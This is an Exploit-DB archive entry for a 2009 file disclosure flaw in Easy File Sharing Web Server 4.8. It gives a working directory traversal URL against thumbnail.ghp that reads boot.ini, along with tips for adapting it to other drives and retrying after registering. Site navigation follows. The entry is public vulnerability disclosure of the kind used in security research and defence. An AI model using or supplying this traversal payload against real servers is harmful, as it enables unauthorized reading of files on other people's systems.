Easy File Sharing Web Server 4.8 - File Disclosure

EDB-ID:

8155

CVE:

2009-4809

EDB Verified:

Author:

Stack

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2009-03-04

Vulnerable App: 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Easy File Sharing Web Server File Disclouse Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Program:  Easy File Sharing Web Server
Version:  4.8
Download: http://www.sharing-file.com/efssetup.exe
Found by Mountassif Moad
www.v4-team.com

-- Bug --
Exploit :

http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini
if you have a hard disk like d or f you change disk_c by disk_d or disk_f some host dont have this
and if dont work in first test try to register and test another time
Tested on win xp SP 2 fr

# milw0rm.com [2009-03-04]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services